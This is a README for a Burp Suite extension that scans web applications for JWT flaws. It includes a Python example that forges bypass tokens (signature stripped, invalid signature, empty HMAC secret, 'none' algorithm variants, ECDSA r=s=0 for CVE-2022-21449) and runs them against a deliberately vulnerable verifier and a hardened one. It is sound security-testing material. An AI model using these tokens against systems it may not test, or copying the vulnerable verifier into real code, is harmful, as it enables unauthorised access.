JWT Scanner is a Burp Suite extension for automated testing of JSON Web Token (JWT) implementations in web applications.
Features:
- Signature presence (is a token with its signature removed still accepted?)
- Invalid signatures (is a token with a wrong signature still accepted?)
- Signatures computed with an empty HMAC secret
- Acceptance of the "none" algorithm, including case variations (none, None, NONE, nOnE)
- Invalid ECDSA signature parameters, r = s = 0 (CVE-2022-21449, the Java ECDSA "psychic signatures" bug)
- JWK injection: an attacker-supplied public key placed in the token's jwk header and used by the server to verify the signature
- Select a base request and autodetect the JWT in it
- Manually select the target JWT in the source request
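To show what the checks above send, here is an added example that is not JWT Scanner's own code (the extension is written in Java; this is a standard-library Python model of the same probes). It derives one mutated token per check from a token the server currently accepts, then runs the whole set against a deliberately vulnerable verifier and a hardened one. The HS256 secret and the payload are constructed for the demo. JWK injection needs an attacker-controlled RSA or EC key pair and is not built here.

```python
"""Probe set for JWT implementation checks, run against a vulnerable and a hardened verifier.

Added example, not JWT Scanner's own code. Standard library only, so it covers the
signature-presence, invalid-signature, empty-secret, alg-none and ECDSA-parameter
probes; the JWK-injection probe needs an attacker key pair and is omitted.
"""
import base64
import hashlib
import hmac
import json

# Constructed server-side HMAC secret (40 bytes, long enough for the hardened verifier).
SECRET = b"constructed-demo-secret-0123456789abcdef"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_json(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header_b64: str, body_b64: str, secret: bytes) -> str:
    mac = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    return f"{header_b64}.{body_b64}.{b64url_encode(mac)}"


def valid_token(payload: dict) -> str:
    """A correctly signed HS256 token, standing in for the token captured in Burp."""
    return sign_hs256(encode_json({"alg": "HS256", "typ": "JWT"}), encode_json(payload), SECRET)


def build_probes(token: str) -> dict:
    """Derive one mutated token per check from a token the server currently accepts."""
    header_b64, body_b64, _sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    es256_header = encode_json({**header, "alg": "ES256"})
    probes = {
        # Signature presence: header and claims kept, signature segment emptied.
        "no_signature": f"{header_b64}.{body_b64}.",
        # Invalid signature: 32 bytes that are not the HMAC of this header/body.
        "invalid_signature": f"{header_b64}.{body_b64}.{b64url_encode(b'A' * 32)}",
        # Empty secret: a real HS256 signature over the same data, keyed with b"".
        "empty_secret": sign_hs256(encode_json({**header, "alg": "HS256"}), body_b64, b""),
        # CVE-2022-21449: ES256 signature with r = s = 0 (64 zero bytes in JWS raw encoding).
        "ecdsa_zero_params": f"{es256_header}.{body_b64}.{b64url_encode(bytes(64))}",
    }
    # Algorithm "none" variations, which catch case-insensitive alg comparison.
    for variant in ("none", "None", "NONE", "nOnE"):
        none_header = encode_json({**header, "alg": variant})
        probes[f"alg_{variant}"] = f"{none_header}.{body_b64}."
    return probes


def verify_vulnerable(token: str, secret: bytes) -> bool:
    """Trusts the alg header: accepts unsigned tokens for any spelling of 'none'."""
    header_b64, body_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg", "")
    if alg.lower() == "none":
        return True
    if alg == "HS256":
        mac = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
        return hmac.compare_digest(mac, b64url_decode(sig_b64))
    # No ECDSA here: only a real ECDSA verifier can fail or pass the zero-params probe.
    return False


def verify_hardened(token: str, secret: bytes, expected_alg: str = "HS256") -> bool:
    """Pins the algorithm server-side and refuses weak keys and missing signatures."""
    if len(secret) < 32:
        raise ValueError("HS256 secret must be at least 256 bits")
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return False
    header_b64, body_b64, sig_b64 = parts
    if json.loads(b64url_decode(header_b64)).get("alg") != expected_alg:  # exact, case-sensitive
        return False
    mac = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(mac, b64url_decode(sig_b64))


def accepted_probes(token: str, verifier) -> set:
    """Names of the probes the verifier accepts; a non-empty set is a finding."""
    return {name for name, probe in build_probes(token).items() if verifier(probe, SECRET)}


if __name__ == "__main__":
    token = valid_token({"sub": "alice", "role": "user"})  # constructed claims
    print("vulnerable accepts:", sorted(accepted_probes(token, verify_vulnerable)))
    print("hardened accepts:  ", sorted(accepted_probes(token, verify_hardened)))
```

This mirrors what the extension does over HTTP: each probe is the original request with only the token swapped, and a probe that still yields the baseline 200 response is reported as an issue. The hardened verifier shows the three server-side fixes that make every probe fail: an algorithm pinned in code rather than read from the header, a signature segment that must be present, and a minimum secret length.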
Run an active scan, or manually select a request to check:
- Go to Proxy / Repeater / Target / Logger / Intruder
- Select a request that requires authentication with a valid JWT and returns an HTTP 200 response
NOTE: The extension first resends the selected request unmodified and checks that the JWT is still accepted. If it is not (for example because the token has expired), an error is displayed in the Event Log.
Autodetect JWT from valid request:
- Right-click the request you want to check
- Extension -> JWT-scanner -> Autodetect JWT
- If a vulnerability is identified, an issue is generated
Manually select JWT from valid request:
- Highlight the target JWT in the request
- Right-click the highlighted JWT in the request
- Extension -> JWT-scanner -> Selected JWT
- If a vulnerability is identified, an issue is generated
Installation:
- Download the latest pre-built jar file from releases.
- Extender (named Extensions in recent Burp versions) -> Tab Installed -> Add -> Extension Details -> Extension Type: Java -> Select file ...
- Select the downloaded jar
Using Maven to build the jar file with dependencies:
mvn package -f pom.xml